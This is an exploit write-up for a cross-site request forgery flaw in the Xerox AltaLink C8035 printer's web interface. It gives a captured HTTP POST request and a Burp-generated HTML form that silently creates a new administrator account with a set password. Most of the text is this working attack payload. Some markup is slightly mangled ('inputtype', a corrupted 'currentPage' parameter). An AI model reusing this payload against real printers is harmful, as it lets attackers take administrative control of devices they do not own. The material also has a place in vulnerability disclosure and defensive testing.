# Exploit Title: Xerox AltaLink C8035 Printer - Cross-Site Request Forgery (Add Admin)# Date: 2018-12-17 # Exploit Author: Ismail Tasdelen# Vendor Homepage: https://www.xerox.com/# Hardware Link : https://www.office.xerox.com/en-us/multifunction-printers/altalink-c8000-series# Software : Xerox Printer# Product Version:AltaLink C8035# Vulernability Type : Cross-Site Request Forgery (Add Admin)# Vulenrability : Cross-Site Request Forgery# CVE : N/A# Description :# The CSRF vulnerability was discovered in the AltaLink C8035 printer model of Xerox printer hardware.# A request to add users is made in the Device User Database form field. This request is captured by# the proxy. And a CSRF PoC HTML file is prepared. Xerox AltaLink C8035 printers allow CSRF. A request# to add users is made in the Device User Database form field to the xerox.set URI. # (The frmUserName value must have a unique name.)# HTTP POST Request :
POST /dummypost/xerox.set HTTP/1.1
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0(Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length:707
Origin: https://XXX.XXX.XXX.XXX
Connection: close
Referer: https://XXX.XXX.XXX.XXX/properties/authentication/UserEdit.php?nav_point_key=10
Cookie: PHPSESSID=fd93756986787a2e338da8eae1ff2ef4; statusSelected=n1; statusNumNodes=8; CERT_INFO=8738a6169beda5f6cc754db4fc40ad63; propSelected=n59; propHierarchy=00000001000000000000000010010; LastPage=/properties/authentication/UserManager.php%3Fx%3D%26sort%3DFname%26order%3DUp
Upgrade-Insecure-Requests:1
NextPage=%2Fproperties%2Fauthentication%2FUserManager.php%3F&isRoles=True&isPassword=True&isCreate=True&rolesStr=6%2C1%2C2&limited=0&oid=0&minLength=1&maxLength=63&isFriendlyNameDisallowed=TRUE&isUserNameDisallowed=TRUE&isNumberRequired=&CSRFToken=34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a¤tPage=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10&_fun_function=HTTP_Set_User_Edit_fn&frmFriendlyName=Ismail+Tasdelen&frmUserName=ismailtasdelen&frmNewPassword=Test1234%21&frmRetypePassword=Test1234%21&frmOldPassword=undefined&SaveURL=%2Fproperties%2Fauthentication%2FUserEdit.php%3Fnav_point_key%3D10
# CSRF PoC HTML :<html><!-- CSRF PoC - generated by Burp Suite Professional --><body><script>history.pushState('','','/')</script><form action="https://XXX.XXX.XXX.XXX/dummypost/xerox.set" method="POST"><inputtype="hidden" name="NextPage" value="/properties/authentication/UserManager.php?"/><inputtype="hidden" name="isRoles" value="True"/><inputtype="hidden" name="isPassword" value="True"/><inputtype="hidden" name="isCreate" value="True"/><inputtype="hidden" name="rolesStr" value="6,1,2"/><inputtype="hidden" name="limited" value="0"/><inputtype="hidden" name="oid" value="0"/><inputtype="hidden" name="minLength" value="1"/><inputtype="hidden" name="maxLength" value="63"/><inputtype="hidden" name="isFriendlyNameDisallowed" value="TRUE"/><inputtype="hidden" name="isUserNameDisallowed" value="TRUE"/><inputtype="hidden" name="isNumberRequired" value=""/><inputtype="hidden" name="CSRFToken" value="34cd705fa4b7954de314c8fa919c22c0ec771cb264032c058d230df9a0af0fae90ec55326145b35d14daf2696e3d8302bd3aad10f08d4562178e93804098c32a"/><inputtype="hidden" name="currentPage" value="/properties/authentication/UserEdit.php?nav_point_key=10"/><inputtype="hidden" name="_fun_function" value="HTTP_Set_User_Edit_fn"/><inputtype="hidden" name="frmFriendlyName" value="Ismail Tasdelen"/><inputtype="hidden" name="frmUserName" value="ismailtasdelen"/><inputtype="hidden" name="frmNewPassword" value="Test1234!"/><inputtype="hidden" name="frmRetypePassword" value="Test1234!"/><inputtype="hidden" name="frmOldPassword" value="undefined"/><inputtype="hidden" name="SaveURL" value="/properties/authentication/UserEdit.php?nav_point_key=10"/><inputtype="submit" value="Submit request"/></form></body></html>
